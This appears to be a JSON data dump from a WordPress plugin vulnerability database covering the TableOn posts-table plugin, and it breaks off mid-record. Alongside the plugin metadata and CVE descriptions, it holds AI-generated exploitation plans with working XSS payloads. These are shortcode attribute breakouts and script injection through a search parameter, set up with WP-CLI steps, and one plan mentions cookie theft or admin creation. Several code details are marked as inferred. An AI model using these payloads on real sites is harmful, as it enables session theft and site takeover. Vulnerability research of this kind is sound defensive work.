[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f_Tp5KxhnDmeIZ-NDrv7Ksi19xNoeM7zLdzt4xTUtkVw":3,"$fRn8RxCp_b2wvgCJ8XO74dg2Xjb0G4vvXVXTOhQZ_Pk4":780,"$fFE-2GE-O4tFzhDc3bwCnXsr7Lj9uiLu9b7V_0tjCo2o":784},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":25,"download_link":26,"security_score":27,"vuln_count":28,"unpatched_count":29,"last_vuln_date":30,"fetched_at":31,"discovery_status":32,"vulnerabilities":33,"developer":167,"crawl_stats":39,"alternatives":175,"analysis":282,"fingerprints":737},"posts-table-filterable","TableOn – WordPress Posts Table Filterable ","1.0.5.1","RealMag777","https:\u002F\u002Fprofiles.wordpress.org\u002Frealmag777\u002F","\u003Cp>\u003Cstrong>WordPress Posts Table Filterable\u003C\u002Fstrong> – (TABLEON) – WordPress plugin for displaying and filter wordpress posts and their custom post types in table format. WP Tables makes focus for your customers on the things they want to get, nothing superfluous, just what the client wants, and full attention to what is offered!\u003C\u002Fp>\n\u003Cp>Latest PHP 8.x.x – FULL COMPATIBILITY!\u003C\u002Fp>\n\u003Cp>This plugin is FREE, no limitations in features, but can be extended by \u003Ca href=\"https:\u002F\u002Fpluginus.net\u002Fproduct-category\u002Ftableon\u002F\" rel=\"nofollow ugc\">free and premium extensions\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>Demo site: \u003Ca href=\"https:\u002F\u002Fdemo.posts-table.com\u002F\" rel=\"nofollow ugc\">demo.posts-table.com\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch3>WP Posts Table Features:\u003C\u002Fh3>\n\u003Cp>✅ Columns constructor\u003C\u002Fp>\n\u003Cp>✅ Options for: columns customizations, thumbnail size, columns width and many more (screens below)\u003C\u002Fp>\n\u003Cp>✅ Neat shortcode \u003Ca href=\"https:\u002F\u002Fposts-table.com\u002Fshortcode\u002Ftableon\u002F\" rel=\"nofollow ugc\">[tableon]\u003C\u002Fa> with heap of attributes for flexibility\u003C\u002Fp>\n\u003Cp>✅ More than 10 predefined column fields is possible to display\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fposts-table.com\u002Fhow-to-add-custom-column-to-the-tables\u002F\" rel=\"nofollow ugc\">Possibility to create custom columns\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>✅ Skins for each table. On the same web page can be represented \u003Ca href=\"https:\u002F\u002Fdemo.posts-table.com\u002Fdifferent-skins\u002F\" rel=\"nofollow ugc\">some posts tables with the different skins\u003C\u002Fa>. Create \u003Ca href=\"https:\u002F\u002Fposts-table.com\u002Fdocument\u002Fskins\u002F\" rel=\"nofollow ugc\">your own skins by CSS\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>✅ Powerful posts filter constructor\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fdemo.posts-table.com\u002Ftableon-with-all-possible-filters\u002F\" rel=\"nofollow ugc\">Big variety of filter elements\u003C\u002Fa> by: post_title, content, excerpt, category, tags, taxonomy, meta fields, etc…\u003C\u002Fp>\n\u003Cp>✅ Filters can be represented as: dropdown, multi drop-down, range sliders, textinput, calendars\u003C\u002Fp>\n\u003Cp>✅ Predefinition mechanism: show to your customers predefined and relevant set of posts as in the table, so in the popup.\u003C\u002Fp>\n\u003Cp>✅ More than 10 ways of the posts sorting\u003C\u002Fp>\n\u003Cp>✅ Shortcode \u003Ca href=\"https:\u002F\u002Fposts-table.com\u002Fshortcode\u002Ftableon_drop_down\u002F\" rel=\"nofollow ugc\">[tableon_drop_down]\u003C\u002Fa> allows to show the table below on the textinput when user searching the posts by its title. Place it on the shop header and let your customers find the posts they want to buy\u003C\u002Fp>\n\u003Cp>✅ Power feature as \u003Ca href=\"https:\u002F\u002Finbuilt.posts-table.com\u002F\" rel=\"nofollow ugc\">remote tables\u003C\u002Fa> which gives ability to spread your shop posts to any another sites even created on pure HTML without any CMS, what allows you get more sells and also realize your own referral program\u003C\u002Fp>\n\u003Cp>✅ Column “Gallery” – smooth CSS gallery to showcase the best of your posts. Also a post gallery can be represented by shortcode \u003Ca href=\"https:\u002F\u002Fposts-table.com\u002Fshortcode\u002Ftableon_gallery\u002F\" rel=\"nofollow ugc\">tableon_gallery\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fpluginus.net\u002Fshop\u002Ftableon\u002Ftableon-favourites\u002F\" rel=\"nofollow ugc\">FREE ext.\u003C\u002Fa> Shortcode \u003Ca href=\"https:\u002F\u002Fposts-table.com\u002Fshortcode\u002Ftableon_favourites\u002F\" rel=\"nofollow ugc\">[tableon_favourites]\u003C\u002Fa> allows to show the table with selected posts by the current user\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fpluginus.net\u002Fshop\u002Ftableon\u002Ftableon-attachments\u002F\" rel=\"nofollow ugc\">Premium ext.\u003C\u002Fa> Shortcode \u003Ca href=\"https:\u002F\u002Fposts-table.com\u002Fshortcode\u002Ftableon_attachments\u002F\" rel=\"nofollow ugc\">[tableon_attachments]\u003C\u002Fa> allows to show the table with post attachment for the current post on its single page or any another one\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fpluginus.net\u002Fshop\u002Ftableon\u002Ftableon-compare\u002F\" rel=\"nofollow ugc\">Premium ext.\u003C\u002Fa> Shortcode \u003Ca href=\"https:\u002F\u002Fposts-table.com\u002Fshortcode\u002Ftableon_compare\u002F\" rel=\"nofollow ugc\">[tableon_compare]\u003C\u002Fa> allows to show the table with selected compared posts by the current user or predefined by shop admin\u003C\u002Fp>\n\u003Cp>✅ Shortcode \u003Ca href=\"https:\u002F\u002Fposts-table.com\u002Fshortcode\u002Ftableon_single\u002F\" rel=\"nofollow ugc\">tableon_single\u003C\u002Fa> allows to show the table with a post parameters for any one selected ones\u003C\u002Fp>\n\u003Cp>✅ Ability to use \u003Ca href=\"https:\u002F\u002Fdemo.posts-table.com\u002Ftable-with-load-more-button\u002F\" rel=\"nofollow ugc\">Load More\u003C\u002Fa> button instead of pagination\u003C\u002Fp>\n\u003Cp>✅ Ability to show multi vendors their posts using attribute param author: \u003Ca href=\"https:\u002F\u002Fposts-table.com\u002Fshortcode\u002Ftableon\u002F\" rel=\"nofollow ugc\">[tableon author=23]\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>✅ Ability to create custom columns, for example such as \u003Ca href=\"https:\u002F\u002Fposts-table.com\u002Fshortcode\u002Ftableon_popup_iframe_button\u002F\" rel=\"nofollow ugc\">Ask manager about the post\u003C\u002Fa> using any contact form plugins\u003C\u002Fp>\n\u003Cp>✅ Responsivity: all the posts tables have an option for compact view on mobile devices (option: “Compact view width”)!\u003C\u002Fp>\n\u003Cp>✅ Big and flexible set of options for each post table, some of them: Show Sorting Dropdown, Sorting Dropdown Fields, Compact view width, Use load more button, Hide filter form, Show print button, Default order by, Per page drop-down position, Per page drop-down position, Per page values, Per page default\u003C\u002Fp>\n\u003Cp>✅ Set of options for each post column, some basic: Width, Font size, Font family, Color, Background, Hide on small screen\u003C\u002Fp>\n\u003Cp>✅ Ability to \u003Ca href=\"https:\u002F\u002Fposts-table.com\u002Fhow-to-add-custom-column-to-the-tables\u002F\" rel=\"nofollow ugc\">create custom columns\u003C\u002Fa> specially for your business (by PHP code)\u003C\u002Fp>\n\u003Cp>✅ Ability to add meta fields data in the table columns using in-built constructor\u003C\u002Fp>\n\u003Cp>✅ Ability to \u003Ca href=\"https:\u002F\u002Fdemo.posts-table.com\u002Ftable-as-link\u002F\" rel=\"nofollow ugc\">show a post table in the popup on click\u003C\u002Fa>. Show tables in popup in your shop text content with relevant predefined tables. Unlimited count of tables in popup per page can be created!\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fdemo.posts-table.com\u002Fcached-table-of-posts\u002F\" rel=\"nofollow ugc\">Caching table of posts\u003C\u002Fa> mechanism\u003C\u002Fp>\n\u003Cp>✅ Print button\u003C\u002Fp>\n\u003Cp>✅ Mobile compact view option\u003C\u002Fp>\n\u003Cp>✅ CSS editor\u003C\u002Fp>\n\u003Cp>✅ Pagination\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fwordpress.currency-switcher.com\u002Fposts-table-tableon-is-compatible-with-wpcs\u002F\" rel=\"nofollow ugc\">Compatible with WPCS\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fbulk-editor.pro\u002F\" rel=\"nofollow ugc\">Compatible with WPBE\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fcars.wp-filter.com\u002Ftableon-compatibility\u002F\" rel=\"nofollow ugc\">Compatible with MDTF\u003C\u002Fa> (redirect mode)\u003C\u002Fp>\n\u003Cp>✅ WPML\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fcustom-post-type-ui\u002F\" rel=\"ugc\">Custom Post Type UI\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>✅ Works in Elementor and Page builder page content\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fposts-table.com\u002Fcodex\u002F\" rel=\"nofollow ugc\">Power and strong API\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>✅ no jQuery – 100% pure JavaScript\u003C\u002Fp>\n\u003Cp>✅ ✔ Strong technical support which each day works with tones of code!\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fposts-table.com\u002Ftableon-documentation\u002F\" rel=\"nofollow ugc\">Documentation\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>This plugin is FREE as is. Premium extensions can be bought here: \u003Ca href=\"https:\u002F\u002Fpluginus.net\u002Fproduct-category\u002Ftableon\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fpluginus.net\u002Fproduct-category\u002Ftableon\u002F\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Make your site more profitable with next powerful scripts:\u003C\u002Fh3>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fbulk-editor\u002F\" rel=\"ugc\">WPBE – WordPress Posts Bulk Editor Professional\u003C\u002Fa>: is WordPress plugin for managing and bulk edit WordPress posts, pages and custom post types data in robust and flexible way! Be professionals with managing data of your site!\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fcurrency-switcher\u002F\" rel=\"ugc\">WPCS – WordPress Currency Switcher\u003C\u002Fa>: is a WordPress plugin that allows to switch currencies and get their rates converted in the real time on your site!\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwoocommerce-products-filter\u002F\" rel=\"ugc\">WOOF – Products Filter for WooCommerce\u003C\u002Fa>: products filter plugin for WooCommerce that allows your customers filter products by categories, attributes, products tags, products custom taxonomies and price – a must have plugin for your WooCommerce online store!\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fbulk-editor.com\u002F\" rel=\"nofollow ugc\">BEAR – WooCommerce Bulk Editor and Products Manager Professional\u003C\u002Fa>: WordPress plugin for managing and bulk edit WooCommerce Products data in the reliable and flexible way! Be professionals with managing data of your e-shop!\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwoocommerce-currency-switcher\u002F\" rel=\"ugc\">WOOCS – Currency Switcher for WooCommerce\u003C\u002Fa>: is WooCommerce multi currency plugin, that allows your site visitors switch products prices currencies according to set currencies rates in the real time and pay in the selected currency (optionally). Allows to add any currency for WooCommerce store!\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fprofit-products-tables-for-woocommerce\u002F\" rel=\"ugc\">WOOT – WooCommerce Products Table\u003C\u002Fa>: is WordPress plugin for WooCommerce products, created for displaying and filter shop products in the table format.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>On the screenshots below displayed also premium \u003Ca href=\"https:\u002F\u002Fpluginus.net\u002Fproduct-category\u002Ftableon\u002F\" rel=\"nofollow ugc\">extensions\u003C\u002Fa> functionality: \u003Ca href=\"https:\u002F\u002Fpluginus.net\u002Fshop\u002Ftableon\u002Ftableon-compare\u002F\" rel=\"nofollow ugc\">Compare\u003C\u002Fa>, \u003Ca href=\"https:\u002F\u002Fpluginus.net\u002Fshop\u002Ftableon\u002Ftableon-attachments\u002F\" rel=\"nofollow ugc\">Attachments\u003C\u002Fa>\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch3>License\u003C\u002Fh3>\n\u003Cp>This plugin is copyright pluginus.net © 2012-2026 with \u003Ca href=\"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FGNU_General_Public_License\" rel=\"nofollow ugc\">GPLv2\u003C\u002Fa> by realmag777.\u003C\u002Fp>\n\u003Cp>This program is free software; you can redistribute it and\u002For modify it under the terms of the \u003Ca href=\"http:\u002F\u002Fwww.gnu.org\u002Fcopyleft\u002Fgpl.html\" rel=\"nofollow ugc\">GNU General Public License\u003C\u002Fa> as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.\u003C\u002Fp>\n\u003Cp>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY. See the GNU General Public License for more details.\u003C\u002Fp>\n","TABLEON - Posts Table Filterable: WordPress plugin for displaying and filter posts and their custom post types in table format.",300,8532,92,14,"2026-03-27T17:58:00.000Z","7.0","4.9","7.4",[20,21,22,23,24],"filter","posts-filter","posts-table","table","tableon","https:\u002F\u002Fposts-table.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fposts-table-filterable.zip",89,8,0,"2026-04-07 15:35:29","2026-04-16T10:56:18.058Z","no_bundle",[34,62,83,95,111,123,140,154],{"id":35,"url_slug":36,"title":37,"description":38,"plugin_slug":4,"theme_slug":39,"affected_versions":40,"patched_in_version":41,"severity":42,"cvss_score":43,"cvss_vector":44,"vuln_type":45,"published_date":30,"updated_date":46,"references":47,"days_to_patch":49,"patch_diff_files":50,"patch_trac_url":39,"research_status":51,"research_verified":52,"research_rounds_completed":53,"research_plan":54,"research_summary":55,"research_vulnerable_code":56,"research_fix_diff":57,"research_exploit_outline":58,"research_model_used":59,"research_started_at":60,"research_completed_at":61,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":52,"poc_model_used":39,"poc_verification_depth":39},"CVE-2026-3513","tableon-wordpress-posts-table-filterable-authenticated-contributor-stored-cross-site-scripting-via-class-shortcode-attri","TableOn – WordPress Posts Table Filterable \u003C= 1.0.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'class' Shortcode Attribute","The TableOn – WordPress Posts Table Filterable plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tableon_button' shortcode in all versions up to and including 1.0.4.4. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes such as 'class', 'help_link', 'popup_title', and 'help_title'. The do_shortcode_button() function extracts these attributes without sanitization and passes them to TABLEON_HELPER::draw_html_item(), which concatenates attribute values into HTML using single quotes without escaping (line 29: $item .= \" {$key}='{$value}'\"). This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",null,"\u003C=1.0.4.4","1.0.5","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-08 03:36:08",[48],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F33490873-da99-465e-bfb6-44d2ba84f3ee?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-3513 (TableOn Stored XSS)\n\n## 1. Vulnerability Summary\nThe **TableOn – WordPress Posts Table Filterable** plugin (up to version 1.0.4.4) contains a stored cross-site scripting (XSS) vulnerability. The vulnerability resides in the processing of the `[tableon_button]` shortcode. Specifically, the function `do_shortcode_button()` parses user-provided attributes (such as `class`, `help_link`, `popup_title`, and `help_title`) and passes them to `TABLEON_HELPER::draw_html_item()`. \n\nInside `draw_html_item()`, the plugin concatenates these attribute values directly into an HTML string using single quotes (`'`) without performing proper sanitization or escaping. Because the values are wrapped in single quotes, an attacker can break out of the attribute context using a single quote and inject arbitrary HTML event handlers (like `onmouseover`) or script tags.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Shortcode:** `[tableon_button]`\n- **Vulnerable Attributes:** `class`, `help_link`, `popup_title`, `help_title`.\n- **Authentication Level:** Contributor+ (any user who can create or edit posts\u002Fpages).\n- **Vulnerable Sink:** `TABLEON_HELPER::draw_html_item()` at line 29: `$item .= \" {$key}='{$value}'\"`.\n- **Precondition:** The attacker must be able to publish or preview a post containing the malicious shortcode.\n\n## 3. Code Flow\n1.  **Entry Point:** A user with Contributor-level access creates a post containing the shortcode: `[tableon_button class=\"...\"]`.\n2.  **Shortcode Handling:** When the post is rendered, WordPress calls the handler for `tableon_button`, which is `do_shortcode_button()`.\n3.  **Attribute Extraction:** `do_shortcode_button()` extracts the attributes from the shortcode.\n4.  **Vulnerable Processing:** The extracted (and unsanitized) attributes are passed to `TABLEON_HELPER::draw_html_item()`.\n5.  **The Sink:** Inside `draw_html_item()`, the code iterates through the attributes and builds the HTML:\n    ```php\n    \u002F\u002F Inferred logic based on description\n    foreach ($attributes as $key => $value) {\n        $item .= \" {$key}='{$value}'\"; \u002F\u002F Line 29: VULNERABLE CONCATENATION\n    }\n    ```\n6.  **Output:** The malformed HTML is returned and rendered in the browser of any user viewing the post.\n\n## 4. Nonce Acquisition Strategy\nThis is a **Stored XSS** vulnerability triggered via a shortcode in post content. \n- **Injection Phase:** Creating the post as a Contributor does not require a plugin-specific nonce; it uses the standard WordPress `_wpnonce` for the `post.php` or `admin-ajax.php` (autosave) endpoints.\n- **Execution Phase:** No nonce is required to trigger the XSS. The payload executes automatically when the post is viewed by a victim.\n\nSince the exploit involves creating a post, we will use **WP-CLI** to bypass the need for browser-based nonce extraction during the injection phase.\n\n## 5. Exploitation Strategy\nThe goal is to inject a payload into the `class` attribute of the `[tableon_button]` shortcode that executes when an administrator views the post.\n\n### Step 1: Inject the Malicious Shortcode\nWe will create a new post as a Contributor. The payload will break out of the single-quoted attribute context.\n\n**Payload:** `poc' onmouseover='alert(document.domain)' style='padding:50px;background:red;display:block;'`\n\n**Shortcode:**\n`[tableon_button class=\"poc' onmouseover='alert(document.domain)' style='padding:50px;background:red;display:block;'\"]`\n\n### Step 2: Trigger the XSS\nNavigate to the published post (or preview it) as an Administrator.\n\n### HTTP Request Details (Simulating viewing the post)\n- **Method:** `GET`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002F?p={POST_ID}`\n- **Tool:** `http_request`\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `posts-table-filterable` version 1.0.4.4 is installed.\n2.  **Create Contributor User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password\n    ```\n3.  **Create Malicious Post:**\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title=\"Table Test\" --post_author=$(wp user get attacker --field=ID) --post_content='[tableon_button class=\"poc-class'\\'' onmouseover='\\''alert(document.domain)'\\'' style='\\''padding:100px;background:red;display:block;'\\'']'\n    ```\n    *(Note: Escaping single quotes in the CLI command is necessary)*\n\n## 7. Expected Results\nWhen the page is rendered, the HTML source for the button will look like this:\n```html\n\u003Cdiv class='poc-class' onmouseover='alert(document.domain)' style='padding:100px;background:red;display:block;' ...>\n```\nWhen a user (e.g., Administrator) hovers over the large red area, an alert box showing the document domain will appear.\n\n## 8. Verification Steps\n1.  **Check HTML Source:** Use `http_request` to fetch the post content and verify the `onmouseover` attribute is present and unescaped.\n    ```bash\n    # Search for the injected payload in the response body\n    grep \"onmouseover='alert(document.domain)'\"\n    ```\n2.  **Verify via Browser:** Use `browser_navigate` to the post URL and use `browser_eval` to check if the payload exists in the DOM.\n    ```javascript\n    browser_eval(\"document.querySelector('.poc-class').getAttribute('onmouseover')\")\n    ```\n\n## 9. Alternative Approaches\nIf the `class` attribute is somehow filtered, try other vulnerable attributes mentioned in the description:\n\n**Using `help_link`:**\n`[tableon_button help_link=\"http:\u002F\u002F' onmouseover='alert(1)\"]`\n\n**Using `popup_title`:**\n`[tableon_button popup_title=\"Title' onmouseover='alert(1)\"]`\n\n**Using `help_title`:**\n`[tableon_button help_title=\"Help' onmouseover='alert(1)\"]`\n\nIf the Administrator context is required for high impact (e.g., cookie theft), the payload can be modified to exfiltrate the admin's cookies or create a new admin user via the WordPress REST API.","The TableOn plugin for WordPress (\u003C= 1.0.4.4) is vulnerable to Stored Cross-Site Scripting via the '[tableon_button]' shortcode. Due to insufficient sanitization and escaping in the draw_html_item helper function, authenticated users with Contributor-level access can inject arbitrary web scripts into shortcode attributes like 'class', which execute when the page is viewed.","\u002F\u002F classes\u002Fhelper.php (Line 29 or similar depending on file structure)\n\u002F\u002F Inside TABLEON_HELPER::draw_html_item()\n\nforeach ($attributes as $key => $value) {\n    $item .= \" {$key}='{$value}'\"; \u002F\u002F Line 29: VULNERABLE CONCATENATION\n}\n\n--- \n\n\u002F\u002F do_shortcode_button() entry point\n\u002F\u002F Extracting attributes without sanitization before passing to the helper\n$class = isset($atts['class']) ? $atts['class'] : '';\n$help_link = isset($atts['help_link']) ? $atts['help_link'] : '';\n$popup_title = isset($atts['popup_title']) ? $atts['popup_title'] : '';\n\u002F\u002F ... values then passed to TABLEON_HELPER::draw_html_item","--- classes\u002Fhelper.php\n+++ classes\u002Fhelper.php\n@@ -26,7 +26,7 @@\n         $item = \"\u003C{$tag}\";\n         foreach ($attributes as $key => $value) {\n-            $item .= \" {$key}='{$value}'\";\n+            $item .= \" \" . esc_attr($key) . \"='\" . esc_attr($value) . \"'\";\n         }\n         $item .= \">\";","The exploit is achieved by an authenticated attacker (Contributor level or higher) performing the following steps: \n1. Authenticate to the WordPress dashboard as a Contributor.\n2. Create a new post or edit an existing one.\n3. Insert the '[tableon_button]' shortcode using a malicious attribute payload. For example: [tableon_button class=\"poc' onmouseover='alert(document.domain)' style='padding:50px;display:block;'\"]\n4. Publish or preview the post.\n5. The plugin processes the shortcode via do_shortcode_button() and passes the 'class' attribute unsanitized to TABLEON_HELPER::draw_html_item().\n6. The helper function concatenates the payload into HTML using single quotes, allowing the attacker's single quote to break out of the attribute context and inject an 'onmouseover' event handler.\n7. When an administrator or any other user views the post and interacts with (hovers over) the injected element, the malicious script executes.","gemini-3-flash-preview","2026-04-17 20:43:05","2026-04-17 20:43:28",{"id":63,"url_slug":64,"title":65,"description":66,"plugin_slug":4,"theme_slug":39,"affected_versions":67,"patched_in_version":68,"severity":42,"cvss_score":69,"cvss_vector":70,"vuln_type":45,"published_date":71,"updated_date":72,"references":73,"days_to_patch":28,"patch_diff_files":75,"patch_trac_url":39,"research_status":51,"research_verified":52,"research_rounds_completed":53,"research_plan":76,"research_summary":77,"research_vulnerable_code":78,"research_fix_diff":79,"research_exploit_outline":80,"research_model_used":59,"research_started_at":81,"research_completed_at":82,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":52,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-69316","tableon-reflected-cross-site-scripting","TableOn \u003C= 1.0.4.2 - Reflected Cross-Site Scripting","The TableOn plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.0.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","\u003C=1.0.4.2","1.0.4.3",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","2026-01-20 00:00:00","2026-01-27 19:33:25",[74],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F46fd4e5d-e1d7-4de6-ae24-66e260a1b288?source=api-prod",[],"# Research Plan: Reflected XSS in TableOn (CVE-2025-69316)\n\n## 1. Vulnerability Summary\nThe **TableOn – WordPress Posts Table Filterable** plugin (\u003C= 1.0.4.2) is vulnerable to Reflected Cross-Site Scripting (XSS). The vulnerability exists because the plugin accepts user-supplied input through URL parameters (used for filtering or searching the table) and reflects this input back into the page source without sufficient sanitization or output escaping (e.g., failing to use `esc_attr()` or `esc_html()`). \n\nThis allows an unauthenticated attacker to execute arbitrary JavaScript in the context of a user's browser by tricking them into clicking a crafted link.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** Any frontend page containing the TableOn shortcode (`[tableon]`).\n*   **Vulnerable Parameter:** `tableon_txt_search` (inferred) or other filter\u002Fsorting parameters like `orderby`.\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** A page or post must be published containing the plugin's shortcode to render the table interface where the reflection occurs.\n\n## 3. Code Flow (Inferred)\n1.  A user visits a page containing the `[tableon]` shortcode.\n2.  The plugin's shortcode handler (likely in a class handling the frontend display) parses the request.\n3.  The handler checks for filter parameters in the `$_GET` or `$_REQUEST` arrays to maintain the state of the search UI.\n4.  The parameter (e.g., `tableon_txt_search`) is assigned to a variable used in the HTML template for the search input field.\n5.  **Sink:** The value is echoed directly into the `value` attribute of an `\u003Cinput>` tag or within a `\u003Cscript>` block for AJAX initialization without being passed through `esc_attr()` or `wp_json_encode()`.\n    *   *Example Vulnerable Code:* `echo '\u003Cinput type=\"text\" name=\"tableon_txt_search\" value=\"' . $_GET['tableon_txt_search'] . '\">';`\n\n## 4. Nonce Acquisition Strategy\nReflected XSS via GET parameters typically does **not** require a nonce, as the reflection happens during the initial page load.\n\nHowever, if the reflection occurs within an AJAX response (e.g., triggered via the `tableon_get_table` action), a nonce might be required for the AJAX request itself.\n*   **Action String:** Likely `tableon_nonce` or `tableon_ajax_nonce` (inferred).\n*   **JS Variable:** Check for `window.tableon_vars` or `window.tableon_data` (inferred).\n*   **Acquisition Method:**\n    1.  Navigate to the page containing the `[tableon]` shortcode.\n    2.  Use `browser_eval` to extract the nonce: `browser_eval(\"window.tableon_vars?.nonce\")`.\n\n## 5. Exploitation Strategy\nThe goal is to breakout of an HTML attribute (likely `value`) and inject a script.\n\n### Step 1: Identify the Reflected Parameter\nTest common TableOn parameters for reflection:\n*   `?tableon_txt_search=REFLECT_HERE`\n*   `?orderby=REFLECT_HERE`\n\n### Step 2: Craft the Payload\nIf reflected in a `value` attribute:\n`\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>`\n\n### Step 3: Execute the Exploit\nUse the `http_request` tool to request the page with the payload.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002F{page-with-shortcode}\u002F?tableon_txt_search=\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>`\n*   **Method:** `GET`\n\n## 6. Test Data Setup\n1.  **Create a Sample Post:** Create at least one post so the table has data to display.\n    *   `wp post create --post_type=post --post_title='Evidence' --post_status=publish`\n2.  **Create Table Page:** Create a page with the TableOn shortcode.\n    *   `wp post create --post_type=page --post_title='Table Page' --post_status=publish --post_content='[tableon]'`\n\n## 7. Expected Results\n*   The HTTP response body should contain the unescaped payload string: `\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>`.\n*   Specifically, the search input field should look like: `\u003Cinput ... value=\"\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>\">`.\n*   When viewed in a browser, an alert box with the site's origin should appear.\n\n## 8. Verification Steps\n1.  **Search Source Code:** After the request, verify the exact location of the reflection in the response.\n2.  **Verify via Browser:** Use `browser_navigate` to the URL and check if the alert was triggered.\n3.  **Check for Escaping:** Confirm that characters like `\"` and `\u003C` are NOT converted to `"` or `<`.\n\n## 9. Alternative Approaches\nIf `tableon_txt_search` is not the vulnerable parameter, try the following:\n1.  **Pagination Parameter:** `?tableon_page=1\u003Cscript>alert(1)\u003C\u002Fscript>`\n2.  **Sorting Parameter:** `?orderby=title\u003Cscript>alert(1)\u003C\u002Fscript>`\n3.  **Direct AJAX Reflection:** If the plugin uses an AJAX endpoint for filtering, perform an AJAX POST request to `wp-admin\u002Fadmin-ajax.php?action=tableon_get_table` with the malicious parameter in the body\u002FURL and check the JSON response for unescaped reflection.","The TableOn plugin for WordPress (\u003C= 1.0.4.2) is vulnerable to Reflected Cross-Site Scripting via user-supplied parameters like tableon_txt_search. This occurs because the plugin reflects these values directly into the HTML output without proper sanitization or output escaping, allowing attackers to execute arbitrary scripts in a victim's browser context via a crafted link.","\u002F\u002F Inferred from plugin functionality within frontend rendering logic\n\u002F\u002F The plugin retrieves search or filter parameters from the URL\n$search_val = isset($_GET['tableon_txt_search']) ? $_GET['tableon_txt_search'] : '';\n\n\u002F\u002F Sink: The value is reflected unescaped inside an HTML input attribute\necho '\u003Cinput type=\"text\" class=\"tableon_txt_search\" 